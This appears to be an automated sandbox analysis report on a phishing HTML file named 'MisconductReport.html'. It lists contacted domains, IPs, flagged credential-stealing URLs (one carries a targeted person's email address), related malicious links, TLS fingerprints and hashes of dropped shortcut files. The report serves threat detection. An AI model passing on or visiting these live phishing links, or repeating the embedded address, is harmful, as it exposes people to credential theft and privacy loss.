https://nvohxxicwod.trcvtoke.ru	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
horizon.sologerg.com	104.21.20.93	true	false	unknown
a.nel.cloudflare.com	35.190.80.1	true	false	high
accounts.google.com	172.253.122.84	true	false	high
www.google.com	142.251.167.104	true	false	high
clients.l.google.com	142.251.167.139	true	false	high
nvohxxicwod.trcvtoke.ru	104.21.20.153	true	false	unknown
windowsupdatebg.s.llnwi.net	69.164.0.0	true	false	unknown
clients1.google.com	unknown	unknown	false	high
clients2.google.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://horizon.sologerg.com/hihihji/	false	Avira URL Cloud: safe	unknown
https://horizon.sologerg.com/favicon.ico	false	Avira URL Cloud: safe	unknown
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1	false		high
file:///C:/Users/user/Desktop/MisconductReport.html	true	Avira URL Cloud: safe	low
https://nvohxxicwod.trcvtoke.ru/	false	Avira URL Cloud: safe	unknown
https://a.nel.cloudflare.com/report/v3?s=dTR7S2086hubIAE7HBAz5m%2FYaDQQYrrWQkDDFq4dbWOAxLXfc18J7xeMA1W6yzlOpFuauNoTGbYISMIfsSI4Y%2F2wUYbzc7O6jK%2FiniSmN9We6gFtsoDymMXk7n%2BduSsuB3nOH%2Ff5yg%3D%3D	false		high
https://a.nel.cloudflare.com/report/v3?s=rxg2wLNOqsUkNdECmNqpR0ejq5GBwBzX%2BnW5Q7lkAXEuqaE4BPWmxV2h%2BfanqVw6lfP4f3ZraHDprxL8D3yui5pf6NjYjS8oeB2uOTeM4MCTB046ZCaTWR8CvXL%2F	false		high
https://horizon.sologerg.com/hihihji/#Ematt.r@ebizcharge.com	true	SlashNext: Credential Stealing type: Phishing & Social Engineering	unknown
https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard	false		high
https://horizon.sologerg.com/BBPD10KJ4COSR2J92DMZHPB2JKQ9PX-qliezfq46gnh-dist31o6dw0?TB54CRC5PDRGQOFM023B80CHXA9BS0-sdk22iw1h43e-lfztdonl8mj0qo	false	Avira URL Cloud: safe	unknown
https://clients1.google.com/tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=0000000000000000000000000000000000000000798875FE8C	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://nvohxxicwod.trcvtoke.ru	chromecache_81.2.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.193.41	unknown	United States	13335	CLOUDFLARENETUS	false
142.251.167.104	www.google.com	United States	15169	GOOGLEUS	false
142.251.167.139	clients.l.google.com	United States	15169	GOOGLEUS	false
172.253.122.84	accounts.google.com	United States	15169	GOOGLEUS	false
172.253.63.113	unknown	United States	15169	GOOGLEUS	false
104.21.20.93	horizon.sologerg.com	United States	13335	CLOUDFLARENETUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
104.21.20.153	nvohxxicwod.trcvtoke.ru	United States	13335	CLOUDFLARENETUS	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.8
192.168.2.5
192.168.2.30

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1398961
Start date and time:	2024-02-26 18:11:47 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 20s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowshtmlcookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	MisconductReport.html (renamed file extension from html_ to html)
Original Sample Name:	MisconductReport.html_
Detection:	MAL
Classification:	mal56.phis.winHTML@30/11@16/12
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Browse: https://horizon.sologerg.com/hihihji/#Ematt.r@ebizcharge.com

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.251.16.94, 34.104.35.123, 142.251.163.95, 172.253.63.95, 142.251.111.95, 172.253.122.95, 142.251.16.95, 172.253.62.95, 142.251.167.95, 172.253.115.95, 192.229.211.108, 23.207.202.60, 23.207.202.47, 23.207.202.69, 23.207.202.67, 23.207.202.75, 23.207.202.64, 23.207.202.52, 23.207.202.78, 23.207.202.73, 20.166.126.56, 72.21.81.240, 23.46.238.240, 23.46.238.185, 23.46.238.153, 23.46.238.208, 23.46.238.202, 23.46.238.210, 23.46.238.187, 23.46.238.232, 23.46.238.233, 172.253.63.94, 69.164.0.0, 23.46.238.194, 23.46.238.235, 23.46.238.201, 23.46.238.209, 23.46.238.178, 23.207.202.71, 23.207.202.81, 23.207.202.72, 23.207.202.80, 23.207.202.54
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, wu.ec.azureedge.net, clientservices.googleapis.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, wu.azureedge.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, edgedl.me.gvt1.com, glb.cws.prod.dcat.dsp.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, optimizationguide-pa.googleapis.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: MisconductReport.html

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
239.255.255.250	https://ds.nomashumedad.com/?gjgpipvc	Get hash	malicious	HTMLPhisher	Browse
	https://api.spently.com/api/spently/click?id=105133&store=hotelcollection&type=OI&cid=6272440696998&url=amoreex.com/Encinacapital/%23anJlc3NhQGVuY2luYWNhcGl0YWwuY29t%2F%3Futm_source%3DDatabase%26utm_medium%3DEmail%26utm_campaign%3DLisini%2520eGifts	Get hash	malicious	HTMLPhisher	Browse
	https://www.smore.com/pv6an	Get hash	malicious	Unknown	Browse
	https://filesourcepro.online/	Get hash	malicious	Unknown	Browse
	https://app.frame.io/presentations/798e246f-64cf-462f-8cb5-14fc41864c07?email_id=dff38d93-81f9-4a5b-ad33-58f1d34acce3&email_type=pending-reviewer-invite	Get hash	malicious	Unknown	Browse
	https://airtable.com/appAK4wK4Am1QKNCt/shrOYz2pP4nnx6T2x	Get hash	malicious	HTMLPhisher	Browse
	https://acrobat.adobe.com/id/urn:aaid:sc:eu:cdb63725-2cb7-4cbc-988d-c28b730d2437	Get hash	malicious	Unknown	Browse
	https://teams-com-en-usmicro.softr.app/	Get hash	malicious	Unknown	Browse
	https://wilsoyeast.uk/dq.PDF	Get hash	malicious	HTMLPhisher	Browse
	http://tyny.to/s9ef82	Get hash	malicious	Unknown	Browse
172.67.193.41	phish_alert_iocp_v1.4.48.eml	Get hash	malicious	Unknown	Browse
172.67.193.41	https://my.decklinks.com/ccommercials/shared/Zv3ExheJd1aB	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
nvohxxicwod.trcvtoke.ru	phish_alert_iocp_v1.4.48.eml	Get hash	malicious	Unknown	Browse	172.67.193.41
nvohxxicwod.trcvtoke.ru	https://my.decklinks.com/ccommercials/shared/Zv3ExheJd1aB	Get hash	malicious	Unknown	Browse	172.67.193.41
windowsupdatebg.s.llnwi.net	https://googleweblight.com/i?u=https://pub-ea44d24f6f4841a89ed727000fbc2411.r2.dev/jJAO01830S7.html#apinquiries@zendeskap.zendesk.com	Get hash	malicious	HTMLPhisher	Browse	69.164.0.0
	https://www.smore.com/pv6an	Get hash	malicious	Unknown	Browse	69.164.0.128
	https://yellow-tangerine-l3an.squarespace.com/	Get hash	malicious	Unknown	Browse	69.164.0.128
	SecuriteInfo.com.Win32.Trojan.PSE.15IBL0F.20313.3866.exe	Get hash	malicious	Unknown	Browse	69.164.0.128
	https://rebrand.ly/Paquette-ES6531301	Get hash	malicious	Unknown	Browse	69.164.0.128
	https://docs.google.com/presentation/d/e/2PACX-1vTv0-pcNmSzBoNDRkDoMKddvFoHq4NYiBk0uWKl89u0DWTjTJC92Yu0EWpbHe8M-vOB1vBB0SmIKbyC/pub?start=false&loop=false&delayms=3000	Get hash	malicious	HTMLPhisher	Browse	69.164.0.0
	https://anatowadechqnikml.s3.ap-southeast-1.amazonaws.com/index.html	Get hash	malicious	Unknown	Browse	69.164.0.0
	https://3pop366.oldnewsupdate.com/	Get hash	malicious	Unknown	Browse	69.164.0.128
	https://user-services-re-register-december-online.escapestories.com/	Get hash	malicious	Unknown	Browse	69.164.0.0
	https://justuspearson.autos/serene/dune/?box=green	Get hash	malicious	Unknown	Browse	69.164.0.0

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://api.spently.com/api/spently/click?id=105133&store=hotelcollection&type=OI&cid=6272440696998&url=amoreex.com/Encinacapital/%23anJlc3NhQGVuY2luYWNhcGl0YWwuY29t%2F%3Futm_source%3DDatabase%26utm_medium%3DEmail%26utm_campaign%3DLisini%2520eGifts	Get hash	malicious	HTMLPhisher	Browse	172.67.202.50
	https://www.smore.com/pv6an	Get hash	malicious	Unknown	Browse	104.17.3.184
	https://app.frame.io/presentations/798e246f-64cf-462f-8cb5-14fc41864c07?email_id=dff38d93-81f9-4a5b-ad33-58f1d34acce3&email_type=pending-reviewer-invite	Get hash	malicious	Unknown	Browse	172.64.41.3
	https://airtable.com/appAK4wK4Am1QKNCt/shrOYz2pP4nnx6T2x	Get hash	malicious	HTMLPhisher	Browse	172.64.155.119
	https://acrobat.adobe.com/id/urn:aaid:sc:eu:cdb63725-2cb7-4cbc-988d-c28b730d2437	Get hash	malicious	Unknown	Browse	104.17.27.92
	Receipt.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	23.227.38.74
	https://teams-com-en-usmicro.softr.app/	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://wilsoyeast.uk/dq.PDF	Get hash	malicious	HTMLPhisher	Browse	172.67.205.157
	http://tyny.to/s9ef82	Get hash	malicious	Unknown	Browse	172.67.176.2
	http://usps.postalasu.top	Get hash	malicious	Unknown	Browse	104.16.250.67
CLOUDFLARENETUS	https://api.spently.com/api/spently/click?id=105133&store=hotelcollection&type=OI&cid=6272440696998&url=amoreex.com/Encinacapital/%23anJlc3NhQGVuY2luYWNhcGl0YWwuY29t%2F%3Futm_source%3DDatabase%26utm_medium%3DEmail%26utm_campaign%3DLisini%2520eGifts	Get hash	malicious	HTMLPhisher	Browse	172.67.202.50
	https://www.smore.com/pv6an	Get hash	malicious	Unknown	Browse	104.17.3.184
	https://app.frame.io/presentations/798e246f-64cf-462f-8cb5-14fc41864c07?email_id=dff38d93-81f9-4a5b-ad33-58f1d34acce3&email_type=pending-reviewer-invite	Get hash	malicious	Unknown	Browse	172.64.41.3
	https://airtable.com/appAK4wK4Am1QKNCt/shrOYz2pP4nnx6T2x	Get hash	malicious	HTMLPhisher	Browse	172.64.155.119
	https://acrobat.adobe.com/id/urn:aaid:sc:eu:cdb63725-2cb7-4cbc-988d-c28b730d2437	Get hash	malicious	Unknown	Browse	104.17.27.92
	Receipt.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	23.227.38.74
	https://teams-com-en-usmicro.softr.app/	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://wilsoyeast.uk/dq.PDF	Get hash	malicious	HTMLPhisher	Browse	172.67.205.157
	http://tyny.to/s9ef82	Get hash	malicious	Unknown	Browse	172.67.176.2
	http://usps.postalasu.top	Get hash	malicious	Unknown	Browse	104.16.250.67
CLOUDFLARENETUS	https://api.spently.com/api/spently/click?id=105133&store=hotelcollection&type=OI&cid=6272440696998&url=amoreex.com/Encinacapital/%23anJlc3NhQGVuY2luYWNhcGl0YWwuY29t%2F%3Futm_source%3DDatabase%26utm_medium%3DEmail%26utm_campaign%3DLisini%2520eGifts	Get hash	malicious	HTMLPhisher	Browse	172.67.202.50
	https://www.smore.com/pv6an	Get hash	malicious	Unknown	Browse	104.17.3.184
	https://app.frame.io/presentations/798e246f-64cf-462f-8cb5-14fc41864c07?email_id=dff38d93-81f9-4a5b-ad33-58f1d34acce3&email_type=pending-reviewer-invite	Get hash	malicious	Unknown	Browse	172.64.41.3
	https://airtable.com/appAK4wK4Am1QKNCt/shrOYz2pP4nnx6T2x	Get hash	malicious	HTMLPhisher	Browse	172.64.155.119
	https://acrobat.adobe.com/id/urn:aaid:sc:eu:cdb63725-2cb7-4cbc-988d-c28b730d2437	Get hash	malicious	Unknown	Browse	104.17.27.92
	Receipt.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	23.227.38.74
	https://teams-com-en-usmicro.softr.app/	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://wilsoyeast.uk/dq.PDF	Get hash	malicious	HTMLPhisher	Browse	172.67.205.157
	http://tyny.to/s9ef82	Get hash	malicious	Unknown	Browse	172.67.176.2
	http://usps.postalasu.top	Get hash	malicious	Unknown	Browse	104.16.250.67

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	https://ds.nomashumedad.com/?gjgpipvc	Get hash	malicious	HTMLPhisher	Browse	23.1.237.91
	https://app.frame.io/presentations/798e246f-64cf-462f-8cb5-14fc41864c07?email_id=dff38d93-81f9-4a5b-ad33-58f1d34acce3&email_type=pending-reviewer-invite	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://wilsoyeast.uk/dq.PDF	Get hash	malicious	HTMLPhisher	Browse	23.1.237.91
	https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:f1c05e94-5d89-4e6a-985f-81ce98d8c477	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://panel.statisticsong.com/scripts/l.js	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://0nlinemmbiyeywhsskd0gotuhqhssbcvposgsai0dsolflktue2.tryuimbghiop.online	Get hash	malicious	Unknown	Browse	23.1.237.91
	http://click.memberplanet.net/ls/click?upn=zWwBCnVwSC0YZm4Jp4uPPk6w8ITB7RDQPS3p-2BdNaFJJAEy5RKG-2B4f5tcZUiZuoQYR2fEc8tGIJhVAu8lmy3-2Fqf9f9UackS-2BvSAhRbpdhIcp-2B3cAGspOMR-2FhAx57-2B21K1zBWCJ2rJwLCSyHfrbmFDVMaMy5-2FPhlzpkPgAoBDan0GjQQvjRzCw0gHlVyRxWkg6WPj	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://googleweblight.com/i?u=https://pub-ea44d24f6f4841a89ed727000fbc2411.r2.dev/jJAO01830S7.html#apinquiries@zendeskap.zendesk.com	Get hash	malicious	HTMLPhisher	Browse	23.1.237.91
	https://www.smore.com/pv6an	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://yellow-tangerine-l3an.squarespace.com/	Get hash	malicious	Unknown	Browse	23.1.237.91
28a2c9bd18a11de089ef85a160da29e4	https://ds.nomashumedad.com/?gjgpipvc	Get hash	malicious	HTMLPhisher	Browse	23.221.242.90 40.127.169.103 20.114.59.183
	https://www.smore.com/pv6an	Get hash	malicious	Unknown	Browse	23.221.242.90 40.127.169.103 20.114.59.183
	https://filesourcepro.online/	Get hash	malicious	Unknown	Browse	23.221.242.90 40.127.169.103 20.114.59.183
	https://app.frame.io/presentations/798e246f-64cf-462f-8cb5-14fc41864c07?email_id=dff38d93-81f9-4a5b-ad33-58f1d34acce3&email_type=pending-reviewer-invite	Get hash	malicious	Unknown	Browse	23.221.242.90 40.127.169.103 20.114.59.183
	https://acrobat.adobe.com/id/urn:aaid:sc:eu:cdb63725-2cb7-4cbc-988d-c28b730d2437	Get hash	malicious	Unknown	Browse	23.221.242.90 40.127.169.103 20.114.59.183
	https://wilsoyeast.uk/dq.PDF	Get hash	malicious	HTMLPhisher	Browse	23.221.242.90 40.127.169.103 20.114.59.183
	http://tyny.to/s9ef82	Get hash	malicious	Unknown	Browse	23.221.242.90 40.127.169.103 20.114.59.183
	http://usps.postalasu.top	Get hash	malicious	Unknown	Browse	23.221.242.90 40.127.169.103 20.114.59.183
	https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:f1c05e94-5d89-4e6a-985f-81ce98d8c477	Get hash	malicious	Unknown	Browse	23.221.242.90 40.127.169.103 20.114.59.183
	https://ir.shareaholic.com/e?a=1&u=https://okt.college/hum3Tm3TQ3Er-4GQ3E8Kvkl-Ql4RA-4GQ3Erm3Ty--4Gank-d58Kvo-y5%3Futm_campaign%3Dshareaholic%26utm_medium%3Dtwitter%26utm_source%3Dsocialnetwork&r=1	Get hash	malicious	HTMLPhisher	Browse	23.221.242.90 40.127.169.103 20.114.59.183

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Feb 26 16:12:39 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.984222384295978
Encrypted:	false
SSDEEP:	48:8OdGTiieHZidAKZdA19ehwiZUklqehN5y+3:8Lnw05y
MD5:	BFA02AF6A1BF42931884E9E2DA70FD53
SHA1:	F8073321AE8F78479DA0147F9816C84A6E4200FC
SHA-256:	930F1ADE23FF210B3548C71064601A897707E62D68D85906A20F648AB8316FF2
SHA-512:	8DDB47E7E9C10A6CE10B52D7998F69E3149AB5A7E3455D2BBD86A7F8ECD74E953982C876980A8F2B1A9546442E2F76AD600AA0E5B88ED841B1F6954893872098
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.........h..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IZX......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VZX......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VZX......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VZX............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VZX.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............u.y.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Feb 26 16:12:39 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.998566995579828
Encrypted:	false
SSDEEP:	48:8kdGTiieHZidAKZdA1weh/iZUkAQkqehk5y+2:8RnK9Q35y
MD5:	436704832FAB33C242520E934F9E2AD5
SHA1:	C6A28FF1FBCAEEAFD6272170103F6CF161D416D2
SHA-256:	1E6E7F4DE0EAB43B046BD00418BF766ADAB71E3CDE50971BBF1A3310C2981808
SHA-512:	938DACDE18D6CE75F881F5A33F63960B0F8459FCD72588CA2D6F1A943DC124A9EF147B382B4745F533E8FAC6BE3EA51AF6A821230E587A3705CED5E152E80E8A
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,........h..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IZX......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VZX......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VZX......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VZX............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VZX.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............u.y.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.010297015709257
Encrypted:	false
SSDEEP:	48:8xbdGTiisHZidAKZdA14tseh7sFiZUkmgqeh7sW5y+BX:8xsnon45y
MD5:	F9979038AC5060842816FAE3CFACA5F0
SHA1:	B43ABE1CD316801CF6456BFF9D545122882F0DE5
SHA-256:	BD2B0CA7DB41623FA634DBBCAF94F9AD8FBE13EABBC07F8A6028899AB7BD3D3D
SHA-512:	9BC7AAF4DD46C9DEB4AC795901BFA8715B9E07CF22FD6EE0C0D5357C2F93917DEDCB02B4EB196A6FE44264D74B023862A4F1CED6644B25F3BD01985CB6402987
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IZX......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VZX......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VZX......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VZX............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............u.y.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Feb 26 16:12:39 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.998025242423579
Encrypted:	false
SSDEEP:	48:87dGTiieHZidAKZdA1vehDiZUkwqehA5y+R:8MnRe5y
MD5:	710E9A723CDDCC5C2E02AAB147B84FFC
SHA1:	07187238E394F8F6842E5370FCC7347D50B4B58F
SHA-256:	E19EF105F8A70683BE212DF5C26F64F6BA84F984FA5B8BEBAEF8BB18ADAA6ED3
SHA-512:	065D5F55CBF4F29F90A3FFF1C11ABF03B1B7ED38597F034B48D83002E4922CD6356E7F50EFDDDDBC83D23760E0DD9F8ACB40A772107D9554DE8BFE55EA820A47
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.........h..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IZX......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VZX......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VZX......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VZX............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VZX.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............u.y.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Feb 26 16:12:39 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.985174836168737
Encrypted:	false
SSDEEP:	48:80dGTiieHZidAKZdA1hehBiZUk1W1qeh65y+C:8Bnx9a5y
MD5:	40C5F625DACDF198E82D338D798181FA
SHA1:	4A902B384A98EC0BFD6B7E954B0BFB802E870D61
SHA-256:	F3828A90DC0CA17EBCFB398BE3FAD0FBB7D55AA1ADABF783C5BB24EDAB626D51
SHA-512:	14538E366B051AE5798FA83A9AA8824852DBBCAE157CD90B93B3B16471EDAB458763D0E24C91F2C76F730429D0889B7EBBECEC9CBD188C8ADC1BF7F6DFE0ABDA
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.........h..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IZX......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VZX......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VZX......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VZX............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VZX.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............u.y.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
